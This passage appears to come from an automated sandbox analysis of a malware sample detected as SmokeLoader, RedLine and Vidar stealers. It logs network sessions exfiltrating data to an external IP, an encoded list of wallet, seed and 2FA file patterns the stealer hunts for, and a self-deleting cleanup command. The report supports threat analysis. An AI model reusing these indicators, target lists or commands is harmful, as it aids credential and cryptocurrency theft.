                                                            2024-05-27 13:24:49 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                            Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.85311237.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:50 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBK
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 453
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:50 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------BFCAAEHJDBKJJKFHJEBKContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------BFCAAEHJDBKJJKFHJEBKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BFCAAEHJDBKJJKFHJEBKCont
                                                            2024-05-27 13:24:51 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.85311337.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:52 UTC279OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 113601
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:52 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BKFBAKFCBFHIJJJJDBFCCont
                                                            2024-05-27 13:24:52 UTC16355OUTData Raw: 36 76 50 71 4d 75 6f 77 79 52 78 4e 62 70 35 56 72 45 79 6a 45 71 6e 6c 74 78 79 65 43 63 65 6e 33 66 78 71 37 62 48 2f 51 34 50 2b 75 61 2f 77 41 71 7a 37 6c 4e 63 74 4e 56 45 74 70 4a 4c 4a 61 7a 79 4b 50 4b 43 68 6c 52 63 52 67 6b 35 50 48 4f 37 67 59 48 55 2b 39 66 6c 6d 46 6a 7a 31 70 66 31 31 50 31 79 4e 5a 30 6f 4a 70 4c 56 64 66 36 2b 52 59 31 71 39 53 77 74 64 54 75 62 67 59 55 57 6b 43 74 74 35 78 75 64 31 2f 4c 6d 70 64 57 47 50 43 46 34 66 57 31 7a 2f 34 36 4b 69 31 33 54 56 31 65 44 55 72 42 70 54 45 4a 72 65 33 47 38 4c 6e 47 4a 48 50 54 38 4b 73 36 34 6e 6c 2b 46 4c 32 50 4f 64 74 73 52 6e 31 77 74 65 37 51 63 66 63 53 33 35 76 38 6a 7a 4d 59 70 65 2b 2b 6e 4b 76 79 50 48 4b 4b 4b 4b 2b 32 50 7a 63 4b 4b 4b 4b 41 43 76 51 76 68 64 2f 79 4c
                                                            Data Ascii: 6vPqMuowyRxNbp5VrEyjEqnltxyeCcen3fxq7bH/Q4P+ua/wAqz7lNctNVEtpJLJazyKPKChlRcRgk5PHO7gYHU+9flmFjz1pf11P1yNZ0oJpLVdf6+RY1q9SwtdTubgYUWkCtt5xud1/LmpdWGPCF4fW1z/46Ki13TV1eDUrBpTEJre3G8LnGJHPT8Ks64nl+FL2POdtsRn1wte7QcfcS35v8jzMYpe++nKvyPHKKKK+2PzcKKKKACvQvhd/yL
                                                            2024-05-27 13:24:52 UTC16355OUTData Raw: 75 56 64 2b 6e 66 2f 41 43 5a 4e 70 31 37 4e 71 4d 63 74 7a 4d 73 53 75 30 72 4c 74 69 6a 57 4e 51 42 77 4d 4b 6f 41 48 35 56 59 47 6f 57 32 6e 50 71 56 78 65 57 77 75 4c 61 44 54 6a 49 36 34 42 59 41 7a 52 71 53 76 6f 77 56 6a 67 2b 74 52 32 4e 72 39 6a 74 76 4b 79 43 64 78 59 6b 44 71 54 55 64 37 5a 53 58 53 79 49 6b 6f 52 4a 6f 76 4a 6d 42 55 48 65 6d 34 4e 6a 6b 63 63 71 44 78 36 56 36 64 53 6a 56 65 45 39 6c 46 2b 39 59 38 61 6c 69 4b 4b 78 2f 74 70 4c 33 4c 74 2f 49 6c 30 38 79 51 33 47 6e 4c 4f 62 56 30 65 36 76 6a 48 64 54 51 37 34 35 59 56 73 6c 6c 69 6b 49 4b 6b 6c 65 64 32 4d 48 42 7a 78 6d 71 39 74 71 37 6a 54 64 56 76 4a 64 54 38 50 78 76 48 4c 5a 6f 6c 36 2b 6e 6c 6f 4e 72 69 58 63 46 54 79 4d 67 6e 41 35 32 44 70 31 70 67 74 4e 54 67 47 6e
                                                            Data Ascii: uVd+nf/ACZNp17NqMctzMsSu0rLtijWNQBwMKoAH5VYGoW2nPqVxeWwuLaDTjI64BYAzRqSvowVjg+tR2Nr9jtvKyCdxYkDqTUd7ZSXSyIkoRJovJmBUHem4NjkccqDx6V6dSjVeE9lF+9Y8aliKKx/tpL3Lt/Il08yQ3GnLObV0e6vjHdTQ745YVsllikIKkled2MHBzxmq9tq7jTdVvJdT8PxvHLZol6+nloNriXcFTyMgnA52Dp1pgtNTgGn
                                                            2024-05-27 13:24:52 UTC16355OUTData Raw: 49 39 7a 73 48 4a 39 68 2f 77 44 57 71 37 34 66 38 58 32 65 71 2b 48 5a 4e 52 75 4a 45 68 6b 74 56 2f 30 70 66 37 70 48 63 65 78 37 66 6c 58 69 6c 37 71 46 7a 71 44 51 6d 34 6b 33 43 43 46 49 49 78 32 56 46 47 41 42 55 75 6b 36 6d 2b 6d 58 54 4e 67 76 62 7a 49 59 72 69 4c 50 2b 73 6a 50 55 66 58 75 44 32 49 46 5a 79 79 71 44 70 76 2b 61 39 2f 2b 42 2f 58 55 39 57 47 61 7a 56 52 66 79 32 74 2f 77 66 36 36 48 75 46 7a 64 77 58 38 76 68 2b 36 74 70 42 4a 44 4c 64 6c 6b 59 64 78 39 6e 6d 72 67 2f 47 66 2f 49 31 58 66 30 6a 2f 41 50 51 46 71 70 34 45 31 53 59 65 49 4c 48 52 68 4a 35 74 6f 74 7a 4a 50 45 78 37 59 68 6b 48 41 37 41 37 73 34 37 45 66 57 72 58 6a 50 38 41 35 47 75 38 2b 6b 66 2f 41 4b 41 74 59 34 61 67 36 47 4d 6a 44 79 66 35 73 6e 4d 61 36 72 34
                                                            Data Ascii: I9zsHJ9h/wDWq74f8X2eq+HZNRuJEhktV/0pf7pHcex7flXil7qFzqDQm4k3CCFIIx2VFGABUuk6m+mXTNgvbzIYriLP+sjPUfXuD2IFZyyqDpv+a9/+B/XU9WGazVRfy2t/wf66HuFzdwX8vh+6tpBJDLdlkYdx9nmrg/Gf/I1Xf0j/APQFqp4E1SYeILHRhJ5totzJPEx7YhkHA7A7s47EfWrXjP8A5Gu8+kf/AKAtY4ag6GMjDyf5snMa6r4
                                                            2024-05-27 13:24:52 UTC16355OUTData Raw: 2b 69 6f 72 57 63 58 56 72 48 4d 42 6a 63 4f 6c 54 56 39 56 54 71 52 71 51 55 34 61 70 71 36 2b 5a 2b 65 59 69 68 55 77 39 57 56 47 71 72 53 69 32 6d 75 7a 54 73 77 6f 6f 6f 71 7a 45 4b 74 57 6d 6d 33 74 38 72 4e 61 57 73 73 77 55 34 62 79 31 7a 69 71 74 64 37 38 4f 2f 77 44 6a 33 31 44 2f 41 48 6b 2f 6b 31 63 65 4f 78 45 71 46 4c 6e 6a 75 65 6a 6c 65 45 68 69 38 52 37 4b 6f 32 6c 5a 37 48 4b 66 38 49 2f 72 48 2f 51 4d 75 76 38 41 76 30 61 54 2b 77 4e 58 2f 77 43 67 5a 64 2f 39 2b 6a 58 73 4e 4a 58 6a 66 32 78 58 37 4c 38 66 38 7a 36 58 2f 56 76 43 66 7a 53 2b 39 66 35 48 69 74 78 5a 58 4e 6f 63 58 4d 45 6b 52 7a 6a 44 72 6a 6e 41 50 38 69 50 7a 71 43 76 54 74 56 53 31 75 48 76 72 53 38 67 6e 5a 5a 4a 41 36 4d 6b 44 74 6a 39 32 6f 79 43 41 52 6e 49 4e 65
                                                            Data Ascii: +iorWcXVrHMBjcOlTV9VTqRqQU4apq6+Z+eYihUw9WVGqrSi2muzTswoooqzEKtWmm3t8rNaWsswU4by1ziqtd78O/wDj31D/AHk/k1ceOxEqFLnjuejleEhi8R7Ko2lZ7HKf8I/rH/QMuv8Av0aT+wNX/wCgZd/9+jXsNJXjf2xX7L8f8z6X/VvCfzS+9f5HitxZXNocXMEkRzjDrjnAP8iPzqCvTtVS1uHvrS8gnZZJA6MkDtj92oyCARnINe
                                                            2024-05-27 13:24:52 UTC16355OUTData Raw: 70 2f 6b 55 38 39 78 62 64 37 72 37 6a 41 67 73 64 52 62 53 4c 4c 52 47 75 4c 71 44 54 62 53 42 30 65 42 4a 32 38 71 64 6d 6b 61 51 4d 79 63 44 49 4c 41 63 35 36 43 72 4b 33 4d 74 75 79 52 70 6f 38 37 52 49 59 4f 42 63 73 4e 77 51 66 76 42 37 62 2f 77 44 78 33 48 46 61 31 4c 57 73 63 46 54 67 72 51 75 75 70 68 50 4e 4b 31 53 56 36 6c 70 65 71 49 62 5a 70 47 68 7a 49 70 56 69 53 64 70 4f 63 44 30 6f 6e 4c 78 79 57 74 7a 48 46 35 72 32 31 78 48 4f 49 39 32 4e 32 78 73 34 7a 7a 6a 4f 4b 6c 6f 72 70 64 4e 53 68 79 4d 34 56 56 63 61 6e 74 46 76 65 35 7a 4e 70 5a 61 74 63 36 42 61 36 4a 63 7a 58 56 76 59 57 38 4d 6b 63 6b 43 54 74 35 56 77 57 6b 61 51 4d 79 63 44 49 33 41 63 35 2b 36 44 56 6c 6d 31 56 44 43 56 73 39 38 64 6c 48 62 47 79 55 79 63 77 54 77 49 71
                                                            Data Ascii: p/kU89xbd7r7jAgsdRbSLLRGuLqDTbSB0eBJ28qdmkaQMycDILAc56CrK3MtuyRpo87RIYOBcsNwQfvB7b/wDx3HFa1LWscFTgrQuuphPNK1SV6lpeqIbZpGhzIpViSdpOcD0onLxyWtzHF5r21xHOI92N2xs4zzjOKlorpdNShyM4VVcantFve5zNpZatc6Ba6JczXVvYW8MkckCTt5VwWkaQMycDI3Ac5+6DVlm1VDCVs98dlHbGyUycwTwIq
                                                            2024-05-27 13:24:52 UTC15471OUTData Raw: 72 38 39 4c 47 33 34 6d 31 36 4c 58 5a 4c 56 34 59 6e 69 38 70 57 44 42 38 48 4f 63 64 50 79 72 43 7a 53 77 78 54 58 4c 71 6c 76 62 7a 7a 73 77 4a 41 69 68 5a 79 51 4d 5a 36 44 74 75 47 66 71 50 57 6d 38 72 4b 38 54 4b 79 53 52 6e 61 36 4f 70 56 6c 50 6f 51 65 52 58 6f 30 59 30 36 63 56 54 67 39 6a 78 63 54 4f 74 57 6d 36 39 56 62 39 62 42 52 52 51 54 67 5a 50 61 74 6a 6d 46 71 76 66 77 74 63 57 55 6b 53 66 65 49 47 50 77 4f 61 6d 59 2b 57 56 38 77 4d 6d 35 42 49 75 39 53 75 35 54 30 59 5a 36 67 2b 74 45 70 4d 41 59 7a 52 79 52 68 64 75 53 38 62 4b 42 75 47 56 35 49 37 6a 6b 65 74 59 31 6f 30 36 74 4f 56 4f 54 30 6b 6d 76 76 30 4f 76 43 56 61 2b 46 78 45 4d 52 53 58 76 51 61 6b 74 4f 71 64 31 63 37 61 32 2b 4a 39 6e 35 43 66 61 39 4a 31 4a 5a 77 4d 4f 49
                                                            Data Ascii: r89LG34m16LXZLV4Yni8pWDB8HOcdPyrCzSwxTXLqlvbzzswJAihZyQMZ6DtuGfqPWm8rK8TKySRna6OpVlPoQeRXo0Y06cVTg9jxcTOtWm69Vb9bBRRQTgZPatjmFqvfwtcWUkSfeIGPwOamY+WV8wMm5BIu9Su5T0YZ6g+tEpMAYzRyRhduS8bKBuGV5I7jketY1o06tOVOT0kmvv0OvCVa+FxEMRSXvQaktOqd1c7a2+J9n5Cfa9J1JZwMOI
                                                            2024-05-27 13:24:54 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.85311437.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:55 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:55 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KECFIDGCBFBAKEBFBKFBCont
                                                            2024-05-27 13:24:56 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:09:22:57
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\Desktop\xvJv1BpknZ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\xvJv1BpknZ.exe"
                                                            Imagebase:0x400000
                                                            File size:247'296 bytes
                                                            MD5 hash:C5261E67BD6D58771E27D7214E8F1C8F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:09:23:03
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff62d7d0000
                                                            File size:5'141'208 bytes
                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:6
                                                            Start time:09:23:23
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\AppData\Roaming\etrtabd
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\etrtabd
                                                            Imagebase:0x400000
                                                            File size:247'296 bytes
                                                            MD5 hash:C5261E67BD6D58771E27D7214E8F1C8F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 29%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:09:23:34
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Imagebase:0x400000
                                                            File size:325'120 bytes
                                                            MD5 hash:EA9DD1EAE2E521666D3F06382104EC10
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 92%, ReversingLabs
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:09:24:05
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\EE6.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\EE6.exe
                                                            Imagebase:0x400000
                                                            File size:1'986'560 bytes
                                                            MD5 hash:2095273C7B526065D7094738AA070E1B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:09:24:08
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Imagebase:0x400000
                                                            File size:881'664 bytes
                                                            MD5 hash:66064DBDB70A5EB15EBF3BF65ABA254B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 4%, ReversingLabs
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:09:24:12
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
                                                            Imagebase:0x290000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:09:24:56
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit
                                                            Imagebase:0xa40000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:09:24:56
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:20
